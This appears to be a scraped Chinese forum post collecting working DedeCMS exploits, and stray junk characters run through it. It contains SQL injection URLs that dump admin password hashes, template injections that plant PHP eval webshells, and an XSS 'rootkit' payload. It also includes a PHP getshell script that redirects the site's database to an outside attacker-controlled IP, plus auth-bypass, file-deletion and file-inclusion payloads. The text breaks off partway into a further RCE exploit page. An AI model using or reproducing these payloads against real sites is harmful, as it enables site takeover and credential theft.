|
|
' l: t4 z, H: b5 }: B/ G- CDedecms 5.6 rss注入漏洞
& Q& V9 R0 c. e! y9 J& Khttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
6 r3 G0 }+ v. i$ w& I6 L6 H1 r& z/ @+ ], p7 i+ i3 g
4 B6 g* ^* `4 O- H
5 e1 R: k% l* P* O9 j" K: ]8 {
+ a" k0 f" c) m( ]
& x5 j3 v) ^2 V
; {) D2 ]: B! y1 i. F8 }9 d1 {( U* f
DedeCms v5.6 嵌入恶意代码执行漏洞
$ m/ S. W8 e1 ^% ?注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}) z: t. u6 N* }' O
发表后查看或修改即可执行7 l2 n8 ~0 Q1 r* }1 }
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}0 c. K: w S: K
生成x.php 密码xiao,直接生成一句话。
" D8 l7 } K/ f9 `5 G3 c
# v9 {8 ?/ A" t# I
- i6 Q7 C4 a! v% t" \; g1 U: H+ D; d1 u1 L4 p* |' h
: W. q- d- O; }5 ]
8 Z3 m6 k4 A2 A0 N
( R) h1 M4 s9 o1 L
, L; ~% N3 V# ^1 R+ m1 g; U+ Q! N0 ^
0 F7 U3 w3 c8 `& {; \Dede 5.6 GBK SQL注入漏洞
) _0 H. ~9 `! L9 s7 Z$ Rhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
1 I. _ z6 m# {$ M) _% g, Phttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
* O5 R/ |% U+ S# Thttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A74 F+ ? a3 h- ~. z
$ s* C$ t9 A' j1 d/ z
( y, P# @! C* r. o
H T* w5 k" C* ]+ l
' `6 n4 w6 p' y8 u7 U; ]; X1 M8 Q& _( x# @: B+ b: ]1 k! S, ]
- e, U# v3 x/ s# {
" D! o& d2 P) c% a& j$ i$ ?
* J n" L: I; _DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
% Q! X8 b8 H$ f9 E6 T1 Y# f6 F! Whttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ; R/ N) _6 G& e* C" u6 V
6 D# _( |8 l" P. u% I
# n* ]1 G E9 T+ O9 _& F! s; H+ a H! `( p e$ b
2 ?: K% J+ i. p& e( R- a1 @! ~! q2 v2 w# p2 v/ Z
* j8 \7 E5 g. { YDEDECMS 全版本 gotopage变量XSS漏洞$ Q/ L& \0 |" z
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 5 ~. \6 i3 `8 K; ?- J
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="; w9 d, ~ T$ K) r9 t
. y4 W3 q' A' R8 J$ E% r' s
. l5 r8 H% ]1 `
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
$ A& H4 d5 G" `1 m5 n0 ` Zhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
8 A3 a% m2 w' w9 [" E6 m! ^" i, d- Z
0 `8 h* N+ I3 M2 U& D
http://v57.demo.dedecms.com/dede/login.php
5 K: Z2 F& L7 o4 ]# d5 m# y& O+ F; @- a: p
' K" Q( o2 M7 y+ s6 V% dcolor=Red]DeDeCMS(织梦)变量覆盖getshell7 j( V! Y, Y$ J7 H: o
#!usr/bin/php -w
5 c5 c: @# R8 s9 u, H<?php4 u* K. A2 G3 Q T5 N4 \$ G
error_reporting(E_ERROR);
. G! R5 y9 e! A; Sset_time_limit(0);" u5 O* R6 M. t& r+ e0 w9 w3 @
print_r('- H2 W( e, t( ]
DEDEcms Variable Coverage. j/ y9 y% e) I
Exploit Author: www.heixiaozi.comwww.webvul.com
+ `3 j# ^" _) g' [2 r+ g);- K# [! C t4 Z# ^ b: }; u
echo "\r\n";
1 Z4 W) E6 r7 Cif($argv[2]==null){
3 i5 e( H6 j2 J: H# S- mprint_r('
3 K3 H. ]8 y0 q0 K% q) T- g+---------------------------------------------------------------------------+% W) T% Y" C; k9 V
Usage: php '.$argv[0].' url aid path) Q7 V6 g6 Y. X' a
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
t1 m1 K$ [. v2 ?# s6 MExample:
" G0 ]( p' x9 \# t( f3 ^php '.$argv[0].' www.site.com 1 old" V' ]* c- E7 V4 w
+---------------------------------------------------------------------------+
0 t6 h4 K9 s8 C7 L: C7 o/ S');
/ E1 |2 N3 O. J. J0 I& hexit;
, v4 E$ Z/ v9 g' F5 g}; ~+ Q6 P0 B7 I/ P
$url=$argv[1];
& a( O# n# ^3 D8 u9 l6 o/ I$aid=$argv[2];$ X) h* S! }4 g5 V
$path=$argv[3];
( C! W3 S2 b! y) ^' G. x$exp=Getshell($url,$aid,$path);
7 D' d& c% H, T2 b5 x- n: `if (strpos($exp,"OK")>12){
) b8 X6 x. ?$ ]8 F! R8 ?% }8 iecho "
w5 L' [8 N: d7 M, W3 l5 KExploit Success \n";
, v# V! P. C) wif($aid==1)echo "
8 v' b0 Y2 n; u& H+ Q oShell:".$url."/$path/data/cache/fuck.php\n" ;
3 P! p1 b2 C5 z( I8 f7 x. _; K! {
: t' q. p; t8 ]! U0 R$ p" b2 q0 `9 m6 x, s7 R$ z
if($aid==2)echo "
5 x* @: T' m$ b' D# y4 w4 TShell:".$url."/$path/fuck.php\n" ;
I5 Q4 J, x* m) O! Z/ w! a2 |' L8 i; T& b; a
8 s0 y2 O2 ]* m$ nif($aid==3)echo "
# ?$ r9 V7 f) h# m# |, ]' Z$ QShell:".$url."/$path/plus/fuck.php\n";! h4 B/ _/ t5 u4 a
3 L, E5 v! i. q- @
4 Z* b: `! Q( a/ L+ Y9 J7 {}else{
- S) O' x$ q- F4 jecho "9 Q: H7 D3 @5 w* ]7 I) G
Exploit Failed \n";0 r% @7 l, J" c4 R
}
+ q# n5 E$ g4 b+ |4 Qfunction Getshell($url,$aid,$path){! [7 H, ?$ e8 `2 d6 x/ R( f
$id=$aid;
+ y$ C4 c9 \/ [! j3 `/ E' K, Z/ \+ Z$host=$url;* g2 W: y& J2 [- F7 a! |' h
$port="80";+ ^- g2 |& K( U' q+ \8 `9 K
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
, v% {, t* Y% T$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";# i* I/ @9 b. O" N, A/ K& T
$data .= "Host: ".$host."\r\n";2 J' t& E7 W+ o
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";% {& W* b$ b8 [
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
: N# \6 C9 J9 a b% b$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n"; D5 E/ E$ }; G# q, e" K
//$data .= "Accept-Encoding: gzip,deflate\r\n";4 P% u9 E9 G" J3 u( W
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";4 G1 {1 h: n5 B" p$ k s; P
$data .= "Connection: keep-alive\r\n";
0 N2 y$ s! ?" m# `8 T, w p& f5 _$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
; [( b5 b1 Z9 ]/ {6 Y$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
1 m, s- a4 ]# W4 c5 c$data .= $content."\r\n";# A3 S' H, v) R) C3 l' W( R( t1 W
$ock=fsockopen($host,$port);
# K& w3 u5 D4 Z' W$ Yif (!$ock) {. f1 c4 n! f% A+ h
echo "
P0 u2 P2 g' }& [) DNo response from ".$host."\n";
+ H" y2 I: ^0 x$ Y1 j3 y9 Z% {}
! i, E) s0 d# f+ g% N: a% Zfwrite($ock,$data);7 k0 N8 h# `! M( L
while (!feof($ock)) {
) l& ~' m2 H7 {$exp=fgets($ock, 1024);- L+ t; y2 s9 ~% d+ E
return $exp;
8 x6 Z3 l7 q# v6 J}' f8 j' n! d. r
}8 Y) z3 G! u& p! g2 t( G; S8 S
/ u& R% {# e; c5 D1 x- l& q& _" E9 ?6 o q3 y
?>9 @% r; |4 W) j4 r
1 s7 P8 {4 ~) V; ?1 V
3 V/ \( P7 t2 h) v( c5 r6 z& ~/ }
7 f, b/ p/ v) `1 i( }$ r( x8 ^
3 M) C& d# h. _9 C ?/ H" ^
l; z2 V |3 n& A4 r7 f8 k& S9 V( m) B; p8 p
O+ Y/ B9 V T" C5 K
) I5 N/ F! R% X ]- B+ ?( Y4 g. k% r$ V6 p, ^
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)0 h3 X- D; l% L% F
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
' u# _+ ?+ v2 D* @ a5 g' Z7 }0 r) Q* U* T
, z, R$ Q0 \0 b, n- \8 b5 Y3 C把上面validate=dcug改为当前的验证码,即可直接进入网站后台
6 y5 {# g" R* R) D* [" O& |% B
# y" R L. m) r) Y. T
9 r1 R* E! t& b! `, A: ^此漏洞的前提是必须得到后台路径才能实现5 d$ W+ E+ a" d$ M) I* V) l
8 Z4 ~) \$ N2 F5 S' M( w" ~$ L7 E4 s
5 m6 T* A& ]5 a/ {+ d) \
& Z) R0 x, l3 F2 [- q5 h3 S4 P& H
4 a" o. [$ I8 i$ [( Z( L$ D3 S3 S9 e! ~" c# g
$ Y3 P& D/ A* c- {, C( H
! H5 |* _- W: o. x$ A
* Y9 [4 O- Q, p( `- x
$ O0 G! Q! X! T8 @ e
' y! \- b6 N6 _& pDedecms织梦 标签远程文件写入漏洞
W9 S; v i4 _6 t7 R' |前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');! _9 W$ B+ |) p& K# [9 u T
# E/ f* F/ K% I5 P# j4 h5 R
% B- _( j6 j# O/ `再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 - `& N2 y x }* @# [
<form action="" method="post" name="QuickSearch" id="QuickSearch">
, @0 @) `, x% l+ e. F" H1 @<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
* U0 Y9 I$ C6 R1 s% R<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
v* s$ j# {, m2 F, e6 n' p( ]! F. R<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />! O2 i7 H- [: P' m& ?! [# O4 Z2 f
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
- G- q4 G* b$ t0 S4 o9 H1 T2 K<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
2 ?/ f) v- q& E& Y# P; `<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />4 v2 C/ H$ `0 I/ q3 G
<input type="text" value="true" name="nocache" style="width:400">$ q V& \; q# H6 D7 H' I
<input type="submit" value="提交" name="QuickSearchBtn"><br />
* Y1 \1 q4 c1 J# A2 Z</form>
9 O8 ]# r! J3 E4 D' K<script>* B7 g7 E/ Q' h' R9 `( Z
function addaction(), N6 E) Q0 t! X0 L- _
{
; E: V6 W3 W9 t( ] }document.QuickSearch.action=document.QuickSearch.doaction.value;
, v @( _' H# \}
, o, x3 I" \, n q: L$ N: {$ o* Q4 n</script>% u- A3 ?2 E: J4 Y1 y5 G# S+ I5 K7 _* T
& W0 s% ^( ~1 f. i8 x: U/ @- v( ^7 p% J+ Y4 K* {
. q3 S9 G4 g" G* J, r
& |$ t4 k' Y9 \: U
`% I: w2 b- Z0 Q
% b/ n/ i; d w$ i$ [
5 t) h a) `0 y f/ t! w
1 ?& B) _' K- {+ C& B( i7 r" L- Y2 M2 U* E# e8 n% @
: S8 x+ J+ e- QDedeCms v5.6 嵌入恶意代码执行漏洞5 g# T3 Q. N+ h8 L
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
* D, ~) K% p+ p3 g; @1 ]a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
- F2 Y; H2 E5 Y5 N* T) E生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
) i" S' m1 p) I6 XDedecms <= V5.6 Final模板执行漏洞
+ L6 _3 F! o3 l8 ?# t注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:3 D0 [4 a g1 B/ B3 l5 y3 ^
uploads/userup/2/12OMX04-15A.jpg3 U2 T2 K) x; J$ W, E# V7 j3 e, u8 b5 k
# w* s1 |/ ]8 _$ _1 d* [* E9 V
; g) F' M! a. S" G/ A
模板内容是(如果限制图片格式,加gif89a):) f; n9 K' Q% y! z( x
{dede:name runphp='yes'}
; D" s2 i' T: ?8 b b/ S/ h$fp = @fopen("1.php", 'a');
0 x: I) b4 z6 m* s! Q@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");7 [" r- f: Y0 M* _; @
@fclose($fp);
+ _3 i P$ ] l8 f2 K{/dede:name}0 ?+ s$ L7 {8 w' W
2 修改刚刚发表的文章,查看源文件,构造一个表单:
: @+ r/ w" M r' R1 J<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
5 T z& w% r2 V6 Z<input type="hidden" name="dopost" value="save" />
+ n' b) L- }. P/ E/ f3 E<input type="hidden" name="aid" value="2" />. A2 ^( W ~ |/ `3 t
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />" I2 \3 Z. ~- \# S- w
<input type="hidden" name="channelid" value="1" />4 p' x+ K6 A( ~$ I! d9 A' H# D; |& d
<input type="hidden" name="oldlitpic" value="" />
% s3 X8 ]7 {1 w<input type="hidden" name="sortrank" value="1275972263" />% I I/ r- M. x, T: R( \
+ P* s5 k4 f6 ^3 E+ X, ]0 A& l: N1 ?# Z
<div id="mainCp">3 h2 m* M3 D# J- Y, Z- h: d) y# \ j
<h3 class="meTitle"><strong>修改文章</strong></h3>. T3 ]5 C7 @, Q/ n6 G. N
4 I" S. }( \3 I& I
' H. m0 d: }' D' P<div class="postForm">8 n; [: {. F# K2 _2 T% O/ p
<label>标题:</label>; y8 n' P* ]3 f0 o! h/ D+ O
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>; K0 ]% c7 N& {4 m& v8 n& p
& P9 x" u# g* Z3 i% u9 L1 }. j" [
+ I* f) D' [) {7 B4 e<label>标签TAG:</label>
9 F# K0 W9 i- F! \<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)7 ~+ W ^4 O0 S; Z' m; R8 s6 i
6 r0 I% V# |% ^9 ]; D- I- t5 N
7 V) j5 h; ^# V" S" f<label>作者:</label>8 x4 r9 w7 K( }( [( G1 R# F* h
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>5 |/ Z: O3 }* U' i! q' D
4 K# ^$ m" m2 ]) R5 A: c: ~$ P4 M0 D, M: `3 i- L7 J6 q1 K7 d1 J
<label>隶属栏目:</label>
2 t% r- ^* {7 y" ]% H% S! W<select name='typeid' size='1'>. p% ?4 T# c% r6 P9 p/ Q
<option value='1' class='option3' selected=''>测试栏目</option>+ g/ S) `3 {, }( |; l
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类): A; r& I1 }9 c- Q, A+ e9 b
$ B& E8 {: ]% r
- W4 l! `! T1 R( n& r7 X" b<label>我的分类:</label>$ b M4 N( S! b; H" u5 @8 F
<select name='mtypesid' size='1'>% Z, s/ U# t- D+ w- ~& J
<option value='0' selected>请选择分类...</option>3 f2 }( @' g B/ q; j
<option value='1' class='option3' selected>hahahha</option>
; ~0 l& f X$ r/ y, Z# M0 ]1 K</select>6 c* j0 c, ^, c! U0 j! D
$ s$ K; ~" i E- `
, O8 v. t# m1 z% K6 n- ?$ F" H6 E<label>信息摘要:</label>' N1 `8 t; m; }5 j! L, R
<textarea name="description" id="description">1111111</textarea>5 s+ G3 `2 w) T& t/ S7 v' I
(内容的简要说明)/ f6 ]" l. t+ o$ A
' N/ H/ r: g" o' @" c0 e$ R
W2 a" ?: ^6 f4 y$ `' ~" R; h& J<label>缩略图:</label>
2 w+ v6 H% D* _ D<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
+ X5 W1 s b* B! _- @" g1 |) g- `. ~
% ^& T" ?1 \* t; L# R* S
<input type='text' name='templet'' z0 W0 N* ?8 q0 g8 M
value="../ uploads/userup/2/12OMX04-15A.jpg">
; X! O( ?& |% j* U<input type='text' name='dede_addonfields'
1 D! i6 C. W; I7 S+ zvalue="templet,htmltext;">(这里构造)
' Y: D* [$ Z# [5 a. j0 j</div>! i+ [5 `$ M6 p- O: z. i
( F3 a; a- I7 I% \, C4 H5 |6 B- K/ R! A
+ D/ Y6 l% `( i, r) K/ q( p
<!-- 表单操作区域 -->
5 \# @* v& P3 K! L# {# |8 Q<h3 class="meTitle">详细内容</h3>
( x; H7 n, I# |3 x4 Q" q5 |) g* I9 D/ l( Y" M
. l1 f+ x4 S0 a" ^- D$ {) ?, K
<div class="contentShow postForm">7 ]6 B8 O1 P% C7 \2 A3 \! a
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
/ V5 g' a) b8 Q8 Z& }' C( q4 k5 N n: s5 W5 X+ B
' O! s4 L+ L7 \/ N0 D4 }<label>验证码:</label># V7 u7 r- S. {$ [$ q
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
9 l5 e5 m" c9 {2 g' I( l<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
' E, m1 C" U3 ?
8 y( G6 N: j9 t- {5 o9 e* c1 V- A, p+ g
<button class="button2" type="submit">提交</button>
. W8 q7 n0 ^: K+ j* D<button class="button2 ml10" type="reset">重置</button>: X. F3 `; _, K+ a, ?3 o9 K8 K1 o
</div>
' Y- m- u. {' h) ^8 j0 i$ ^; E& { ?
' f6 c% [: ?0 j. y" _- [
</div>, [" v6 }3 A8 ~
: e% N5 t& n$ a4 p7 @7 n
0 Y& e; j3 K; N' N$ a w</form>
) d% g4 t- z4 \
+ D, Z2 R& J; I% q! h% ^& M5 V/ x- X% Y* {; p! G! ^
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
# _$ z( e2 T y0 k. E) G假设刚刚修改的文章的aid为2,则我们只需要访问:
6 q% h& V. x' T5 d! b9 ]6 \http://127.0.0.1/dede/plus/view.php?aid=2
- h6 f8 z7 P2 j2 j' i* O$ q& `: S即可以在plus目录下生成webshell:1.php
# O9 y- w* F+ m, F! A
8 ~" ^4 O( G! n4 [! F: c
O! i% l2 ^4 `) l& @5 j& S* a8 \- s8 r( O/ |
) h5 g9 X% f# d% p' e7 Z' d5 Z: _
2 x8 B6 }( e* ]
" S8 U% I/ a8 \7 H
: }" e( N+ o( Y5 H+ H. x' y) I( Z3 j3 A
6 r; {- X' Q4 ?" |( d
) b5 P2 [8 m) P3 ~
/ o! f, l6 B( vDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)2 R, l {! J, e8 J
Gif89a{dede:field name='toby57' runphp='yes'}0 J+ v5 G: x6 ?: N
phpinfo();% c. V) b c* a, I k+ K
{/dede:field}
# [0 Q# ? n& p6 C# D; v( m保存为1.gif7 }( ]" M: g* A H! r
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
9 I3 Z9 L9 ]- f' }* R) h<input type="hidden" name="aid" value="7" /> 8 [( m1 U) |& z6 m3 q0 Z& A( D
<input type="hidden" name="mediatype" value="1" /> , w8 {8 X- h0 {( M8 @& T- N# r
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> : j0 [+ i6 |$ @8 u4 t0 O
<input type="hidden" name="dopost" value="save" />
7 e y$ N* q/ Q( P<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
& M' q+ n, d. x& \6 f<input name="addonfile" type="file" id="addonfile"/> & B" N1 L& f! z9 c/ y6 P
<button class="button2" type="submit" >更改</button> % T& p' h3 Z8 e! j$ |/ @/ |
</form>
6 n0 R1 A8 x5 b i3 r8 ?
; h7 A2 B) e! {& Q: a- }. D3 D: }+ D# {1 B8 D
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
; R/ t' B7 V |7 Z发表文章,然后构造修改表单如下:
+ Z( \& j3 R! H% ^/ V5 _- K4 |; C: i9 m
+ `. z5 b/ i1 j0 m" x<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> ! R; b6 l! F' o8 |3 X
<input type="hidden" name="dopost" value="save" />
7 A% k9 ]$ W7 i0 T<input type="hidden" name="aid" value="2" /> + v J+ T/ @/ } X! b9 d5 O
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> , |; p( h) q Y3 O% M: B1 f- W8 h
<input type="hidden" name="channelid" value="1" />
7 F7 w7 V2 F H8 O<input type="hidden" name="oldlitpic" value="" /> ' v8 W) T! b: ?
<input type="hidden" name="sortrank" value="1282049150" />
3 R+ A4 x% w. l2 W<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> % N5 R0 G: H! c0 u+ W
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> : G# t1 y( [/ l9 B# N( |
<select name='typeid' size='1'>
% i/ S9 u( C( P6 f; A<option value='1' class='option3' selected=''>Test</option>
' J$ Z1 B, C u<select name='mtypesid' size='1'>
, _5 i( `4 v+ r& J9 r0 h<option value='0' selected>请选择分类...</option>
# v4 S; |: C: V2 c1 T" C<option value='1' class='option3' selected>aa</option></select> - u% i2 w9 m1 ]
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> " t' f9 {" ` k$ r) I
<input type='hidden' name='dede_addonfields' value="templet"> 4 R9 e# Q8 F! }' h$ l Y
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
" ?9 {% H, M7 G( w: {2 Y) r% W<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
6 h6 R$ K0 E% ] a6 V7 q. M3 ?<button class="button2" type="submit">提交</button>
! z/ U' K, D+ x" C2 ]( S2 x' i</form>$ M: C" a9 }0 f5 m7 m$ r% ~* u$ W
9 k+ T/ s! P* `8 h* w: ?; N) a8 T( l: G7 Y8 `
. m2 L0 m! b6 e0 Z$ c" f
7 C: d( t/ M6 v: U6 y
/ c9 D' B6 M$ ^8 r$ H7 y. O6 ^% v5 H, F5 Z# A
/ [; `; Q" g4 h2 y3 Z
: \1 J2 A0 H6 X r
6 w$ T0 Q- p4 Q' N2 [5 ]+ n5 S! Z5 \
. Z p5 \- E7 a9 l) x/ f$ j* S* O0 D5 N
织梦(Dedecms)V5.6 远程文件删除漏洞& C5 k5 h$ g1 H3 l, c
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
5 u1 n" w4 a" K( m; t' F
) X( p( B5 A% v5 |" H- J- R0 f( V# M2 ?# T
" Y) {; `0 T8 A; q. f9 a5 l7 r' h2 Z! i0 r0 R" D
* r8 T+ [) D6 |; a
. f) M! |' N2 i6 }2 @- s1 R% x5 V4 O" k' y, Z) S
8 j7 f& v* r# o7 [
' H( u; B0 | j8 j5 q- a7 d4 I2 o( L' H8 `
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 , R+ w3 o4 Q7 D4 A5 {5 X8 ^! o
http://www.test.com/plus/carbuya ... urn&code=../../
! N1 f: E% K+ }4 @9 N2 n- S% t$ K$ p
! X, T- Y: J, W( z
0 r/ U; D2 W; [6 M4 E
7 h- Q+ D9 Y6 n. v' G) \ x2 _# Z0 o
0 O% n1 \- d' G6 e
; t* U5 t9 o' c" Z+ k# b
0 p0 O3 u; o' O" h, D; R! H" ~/ V4 p4 M) R, g4 C
8 A, V5 `# @; S3 w( G0 }. wDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 {' w/ ]9 G1 P3 C. R, N) Z7 C
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
% A: |$ N) E& L密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5$ K+ M: u- b! H$ b' I; _
& @% ~3 _2 m8 H5 R, o/ L/ T! _+ |, [; \% i! K/ @
' G% H6 P2 C+ Y0 p; {1 v% Z5 J
2 d0 X5 T$ X& ~ |# Q
% M' e& G# i# J) K+ ]/ y
0 r& I6 p. G/ m! O. d: {+ g% S% K, n
" H4 X, g& ?3 A) A, M
6 l) ~5 {' C) Q) `+ }$ d1 y5 [7 X0 U/ w7 q Z3 S
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞+ I+ [ ^8 b; q6 M& _
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='* a7 k3 \$ r: b3 q: V5 M L6 J
9 }4 ^! q5 e( Y7 v% I t2 i
! {* a! X" K0 e* ?) w6 N L/ W% ^4 q% n& S, j D
3 @. N5 R- k) i; G' j$ {
( v/ e4 l: u2 j. d: R
1 M8 N! D8 [% h3 x8 ~
4 C( d0 B4 ]8 c) N" a# r6 C; I
0 x! H. V5 H0 ?/ s7 }# O
e% x0 W, c I& b& E# s2 P
; K5 Z) o7 L N织梦(Dedecms)select_soft_post.php页面变量未初始漏洞$ V/ @* e$ f4 O' H0 M
<html> k1 [( |( @3 o/ S2 e
<head>
$ J; E# _6 Q& T! y2 I+ Q<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
3 o9 W+ r9 N3 p1 y9 N5 v* M</head>9 ^! m) e; t9 }* K f& W4 I( Y
<body style="FONT-SIZE: 9pt"># D! U+ K* j4 f3 A8 h
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
